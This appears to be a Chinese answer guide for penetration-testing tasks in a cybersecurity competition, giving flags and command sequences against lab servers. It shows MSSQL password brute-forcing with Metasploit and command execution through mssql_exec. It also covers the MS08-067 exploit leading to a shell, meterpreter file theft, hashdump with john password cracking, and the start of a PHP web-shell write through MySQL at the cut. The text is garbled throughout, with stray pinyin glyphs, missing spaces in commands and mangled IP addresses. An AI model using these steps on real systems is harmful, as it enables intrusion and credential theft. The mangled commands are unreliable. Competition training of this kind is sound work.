網(wǎng)絡(luò)空間安全競(jìng)賽單兵滲透試題解析

ARP掃描滲透測(cè)試1.11.通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行ARP掃描滲透測(cè)試（使用工具arping，發(fā)送請(qǐng)求數(shù)據(jù)包數(shù)量為5個(gè)），并將該操作使用命令的參數(shù)字符串作為Flag提交；（16分）完整操作 arping–c5192.168.X.X答案flag -c1.2通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行ARP掃描滲透測(cè)試（使用工具arping，發(fā)送請(qǐng)求數(shù)據(jù)包數(shù)量為5個(gè)），并將該操作結(jié)果的最后1行，從左邊數(shù)第2個(gè)數(shù)字作為Flag提交；（17分）完整操作 arping–c5192.168.X.X答案flag 51.3通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5對(duì)服務(wù)器場(chǎng)景serv2003行ARP掃描滲透測(cè)試（使用工具M(jìn)etasploit中arp_sweep模塊），并將工具M(jìn)etasploit中arp_sweep模塊存放路徑字符串作為Flag（形式：字符串1/字符串2/字符串3/…/字符串n）提交；（16分）完整操作 msfconsole;searcharp_sweep;答案flag auxiliary/scanner/discovery/arp_sweep1.4通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行ARP掃描滲透測(cè)試（使用工具M(jìn)etasploit中arp_sweep模塊），假設(shè)目標(biāo)服務(wù)器場(chǎng)景serv2003在線，請(qǐng)將工具M(jìn)etasploit中arp_sweep模塊運(yùn)行顯示結(jié)果的最后1行的最后1個(gè)單詞作為Flag提交；（17分）完整操作useauxiliary/scanner/discovery/arp_sweep;showoptions;setrhosts192.168.x.x;run/exploit答案flagcompleted1.5通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行ARP掃描滲透測(cè)試（使用工具M(jìn)etasploit中arp_sweep模塊），假設(shè)目標(biāo)服務(wù)器場(chǎng)景serv2003在線，請(qǐng)將工具M(jìn)etasploit中arp_sweep模塊運(yùn)行顯示結(jié)果的第1行出現(xiàn)的IP地址右邊的第1個(gè)單詞作為Flag提交；（16分）完整操作答案flagappears(呈現(xiàn)－開(kāi)機(jī))invalid(不能識(shí)別－關(guān)機(jī))1.6通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行ARP掃描滲透測(cè)試（使用工具M(jìn)etasploit中arp_sweep模塊），假設(shè)目標(biāo)服務(wù)器場(chǎng)景serv2003在線，請(qǐng)將工具M(jìn)etasploit中arp_sweep模塊的運(yùn)行命令字符串作為Flag提交。（18分）完整操作答案flagrun或者exploitMSSQL數(shù)據(jù)庫(kù)滲透測(cè)試（100分）2.1在本地PC滲透測(cè)試平臺(tái)BT5中使用zenmap工具掃描服務(wù)器場(chǎng)景serv2003所在網(wǎng)段(例如：/24)范圍內(nèi)存活的主機(jī)IP地址和指定開(kāi)放的1433、3306、80端口。并將該操作使用的命令中必須要使用的字符串作為FLAG提交；（10分）完整操作zenmap;目標(biāo)00/24；命令nmap-p1433,3306,80-T4-A-v00/24答案flag -p1433,3306,802.2通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行系統(tǒng)服務(wù)及版本掃描滲透測(cè)試，并將該操作顯示結(jié)果中mssql數(shù)據(jù)庫(kù)服務(wù)對(duì)應(yīng)的服務(wù)端口信息作為FLAG提交；（10分）完整操作 nmap-sV00答案flag 1433/tcp2.3在本地PC滲透測(cè)試平臺(tái)BT5中使用MSF中模塊對(duì)其爆破，使用search命令，并將掃描弱口令模塊的名稱作為FLAG提交；（10分）完整操作msfconsole;searchmssql_login;答案flag mssql_login2.4.在上一題的基礎(chǔ)上使用命令調(diào)用該模塊，并查看需要配置的信息（使用showoptions命令），將回顯中需要配置的目標(biāo)地址,密碼使用的猜解字典,線程,賬戶配置參數(shù)的字段作為FLAG提交（之間以英文逗號(hào)分隔，例hello,test，..,..）；（10分）完整操作showoptions答案flag RHOSTS,PASS_FILE,THREADS,USERNAME2.5在msf模塊中配置目標(biāo)靶機(jī)IP地址，將配置命令中的前兩個(gè)單詞作為FLAG提交；（10分）完整操作setRHOSTS192.168.X.X答案flag setRHOSTS2.6登陸靶機(jī)共享，將共享文件夾password里的passwordList.txt下載到攻擊機(jī)BT5本地，在msf模塊中指定密碼字典，字典路徑為/root/passwordList.txt爆破獲取密碼并將得到的密碼作為FLAG提交；（14分）完整操作我們這里做的時(shí)候先自己創(chuàng)建字典文件，再爆破。先用vim/root/use.txt創(chuàng)建用戶名字典輸入常見(jiàn)用戶名，admin,administrator,root,toor,sa(每個(gè)單詞占一行)；再vim/root/pass.txt創(chuàng)建密碼字典，輸入常見(jiàn)密碼，1234,tbb,tbb123,88888,999999,123456(注意字典中必須有一個(gè)用戶名和密碼是正確的，才能爆破)msf5auxiliary(scanner/mssql/mssql_login)>setuser_file/root/use.txtuser_file=>/root/use.txtmsf5auxiliary(scanner/mssql/mssql_login)>setpass_file/root/pass.txtpass_file=>/root/pass.txtmsf5auxiliary(scanner/mssql/mssql_login)>run仔細(xì)看結(jié)果LoginSuccessful:為成功的進(jìn)入[-]:1433-:1433-LOGINFAILED:WORKSTATION\sa:tbb8342tbb(Incorrect:)[+]:1433-:1433-LoginSuccessful:WORKSTATION\sa:123456[-]:1433-:1433-LOGINFAILED:WORKSTATION\toor:tbb(Incorrect:)答案flag 1234562.7在msf模塊中切換新的滲透模塊，對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行數(shù)據(jù)庫(kù)服務(wù)擴(kuò)展存儲(chǔ)過(guò)程進(jìn)行利用，將調(diào)用該模塊的命令作為FLAG提交；（14分）完整操作searshmssql_exec答案flag useauxiliary/admin/mssql/mssql_exec2.8在上一題的基礎(chǔ)上，使用第6題獲取到的密碼并進(jìn)行提權(quán)，同時(shí)使用showoptions命令查看需要的配置，并配置CMD參數(shù)來(lái)查看系統(tǒng)用戶，將配置CMD參數(shù)的命令作為FLAG提交；（14分）完整操作msf5auxiliary(scanner/mssql/mssql_login)>useauxiliary/admin/mssql/mssql_execmsf5auxiliary(admin/mssql/mssql_exec)>showoptionsmsf5auxiliary(admin/mssql/mssql_exec)>setPASSWORD123456PASSWORD=>123456msf5auxiliary(admin/mssql/mssql_exec)>setCMDcmd.exe/cnetuser答案flag setCMDcmd.exe/cnetuser2.9在利用msf模塊獲取系統(tǒng)權(quán)限并查看目標(biāo)系統(tǒng)的異常（黑客）用戶，并將該用戶作為FLAG提交。（8分）完整操作接上題操作setcmdcmd.exe/c'mdc:\aaaa111'；run;可在目標(biāo)機(jī)C盤建立文件夾（通過(guò)sql漏洞提權(quán)，可執(zhí)行一切操作，可怕）答案flag Hacker主機(jī)發(fā)現(xiàn)與信息收集3.1通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5使用fping對(duì)服務(wù)器場(chǎng)景serv2003所在網(wǎng)段(例如：/24)進(jìn)行主機(jī)發(fā)現(xiàn)掃描,并將該操作使用的命令中必須要使用的參數(shù)作為FLAG提交；（12分）完整操作fping–g192.168.x.x答案flag -g3.2通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5使用genlist對(duì)服務(wù)器場(chǎng)景serv2003所在網(wǎng)段進(jìn)行掃描進(jìn)行主機(jī)存活發(fā)現(xiàn),并將該操作使用的命令中必須要使用的參數(shù)作為FLAG提交；（12分）完整操作 genlist-s192.168.1.*答案flag -s3.3在通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5使用nbtscan對(duì)服務(wù)器場(chǎng)景serv2003所在網(wǎng)段進(jìn)搜索掃描，獲取目標(biāo)的MAC地址等信息，并將該操作使用的命令中必須要使用的參數(shù)作為FLAG提交；（12分）完整操作完整操作 nbtscan–r/24答案flag -r3.4假設(shè)服務(wù)器場(chǎng)景serv2003設(shè)置了防火墻無(wú)法進(jìn)行ping檢測(cè)，通過(guò)PC中滲透測(cè)試平臺(tái)BT5使用arping檢測(cè)主機(jī)連通性掃描（發(fā)送請(qǐng)求數(shù)據(jù)包數(shù)量為4個(gè)），并將該操作使用的命令中固定不變的字符串作為FLAG提交；（12分）完整操作 arping–c410答案flag arping-c43.5通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5使用fping對(duì)服務(wù)器場(chǎng)景serv2003所在網(wǎng)段進(jìn)行存活性掃描，且要把最終掃描的存活主機(jī)輸出到文件ip.txt中，并將該操作使用的命令中必須要使用的參數(shù)作為FLAG提交（各參數(shù)之間用英文逗號(hào)分割，注意題目要求的先后順序，例a,b）；（12分）完整操作fping10–g–a–Labc.txt答案flag -g,-a3.6通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5使用nbtscan從第5題的ip.txt文件中讀取IP掃描主機(jī)信息MAC地址等信息，并將該操作使用的命令中固定不變的字符串作為FLAG提交；（12分）完整操作 nbtscan–fip.txt答案flag nbtscan–f3.7 通過(guò)本地PC中滲透測(cè)試平臺(tái)BT5使用xprobe2對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行TCP掃描，僅掃描靶機(jī)80,3306端口的開(kāi)放情況(端口之間以英文格式下逗號(hào)分隔)，并將該操作使用的命令中固定不變的字符串作為FLAG提交；（12分）完整操作 Xprobe2-T80,330610答案flag xprobe2–T80,33063.8過(guò)本地PC中滲透測(cè)試平臺(tái)BT5使用xprobe2對(duì)服務(wù)器場(chǎng)景serv2003進(jìn)行UDP掃描，僅掃描靶機(jī)161,162端口的開(kāi)放情況(端口之間以英文格式下逗號(hào)分隔)，并將該操作使用的命令中固定不變的字符串作為FLAG提交。（16分）完整操作 xprobe2–U161,16210答案flag xprobe2–U161,162完整操作Windows操作系統(tǒng)滲透測(cè)試（100分）1.通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景BJST進(jìn)行操作系統(tǒng)掃描滲透測(cè)試，并將該操作顯示結(jié)果“Running：”之后的字符串作為FLAG提交；（6分）完整操作 nmap-sV-O192.168.x.x 答案flag MicrosoftWindowsXP4.2通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景BJST進(jìn)行系統(tǒng)服務(wù)及版本掃描滲透測(cè)試，并將該操作顯示結(jié)果中445端口對(duì)應(yīng)的服務(wù)版本信息字符串作為FLAG提交；（6分）完整操作 nmap-sV-O192.168.x.x答案flag MicrosoftWindowsXPmicrosoft-ds4.3通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景BJST進(jìn)行滲透測(cè)試，將該場(chǎng)景網(wǎng)絡(luò)連接信息中的DNS信息作為FLAG提交;(例如14)（13分）完整操作msfconsole;useexploit/windows/smb/ms08_067_netapi;setrhosts192.168.x.x;run;shell;ipconfig/all答案flag64.4通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景BJST進(jìn)行滲透測(cè)試，將該場(chǎng)景桌面上111文件夾中唯一一個(gè)后綴為.docx文件的文件名稱作為FLAG提交；（14分）完整操作:在XP桌面222下新建015935f97dc60c9818cbda280e23e1a3b693d67d.docx文件,內(nèi)容52d7b44f256e6431e9b9248884294d13c6c38c12接上題Kalimsf;shell;C:\DocumentsandSettings\Administrator\Desktop\111;dir答案flag 015935f97dc60c9818cbda280e23e1a3b693d67d4.5完整操作接上題kali操作；exit到meterpreter>;cdc:/;ls;cd"DocumentsandSettings";ls;cdAdministrator;ls;cdDesktop;ls;cd111;ls;download015935f97dc60c9818cbda280e23e1a3b693d67d.docx./;打開(kāi)新終端ls;vim015935f97dc60c9818cbda280e23e1a3b693d67d.docx;復(fù)制文件內(nèi)容答案flag 52d7b44f256e6431e9b9248884294d13c6c38c124.6完整操作:在XP桌面222下新建圖像文件，圖像中輸入SecurityLife；接上題Kalimsf操作；cd../;cd222;ls;download222.bmp./;點(diǎn)kali窗口位置主文件夾，雙擊圖像文件答案flag SecurityLife4.7通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景BJST進(jìn)行滲透測(cè)試，將該場(chǎng)景中的當(dāng)前最高賬戶管理員的密碼作為FLAG提交；（10分）完整操作 接上題meterpreter>hashdump(復(fù)制帳號(hào)及密碼);vim新建pass.txt(編輯菜單下粘貼)；john--format=NT./pass.txt答案flag toor1234.8通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景BJST進(jìn)行滲透測(cè)試，將該場(chǎng)景中回收站內(nèi)文件的文檔內(nèi)容作為FLAG提交。（20分）完整操作答案flag 089f4e36079ef2742d5efc7def5a5bf5768f6c6e5Linux操作系統(tǒng)滲透測(cè)試5.1通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景CentOS5.5進(jìn)行操作系統(tǒng)掃描滲透測(cè)試，并將該操作顯示結(jié)果“OSDetails：”之后的字符串作為FLAG提交；（6分）完整操作 nmap-Oip答案flag Linux2.6.9-2.6.305.2通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景CentOS5.5進(jìn)行系統(tǒng)服務(wù)及版本掃描滲透測(cè)試，并將該操作顯示結(jié)果中MySQL數(shù)據(jù)庫(kù)對(duì)應(yīng)的服務(wù)版本信息字符串作為FLAG提交；（6分）完整操作在centos中安裝mysqlyum-yinstall

mysqlmysql-servermysql-devel;開(kāi)戶服務(wù)servicemysqldstart;關(guān)閉防火墻setenforce0；iptables-FKalinamp-O-sVIP地址答案flag MySQL5.0.775.3.通過(guò)本地PC中滲透測(cè)試平臺(tái)Kali對(duì)服務(wù)器場(chǎng)景CentOS5.5進(jìn)行滲透測(cè)試，將該場(chǎng)景/var/www/html目錄中唯一一個(gè)后綴為.html文件的文件名稱作為FLAG提交；（12分）完整操作 CentOS開(kāi)mysq遠(yuǎn)程訪問(wèn)，詳細(xì)設(shè)置請(qǐng)看“CentOS下的Mysql的安裝和使用”Kali登錄mysqlmysql-h91-uroot-p;select'<?phpsystem($_GET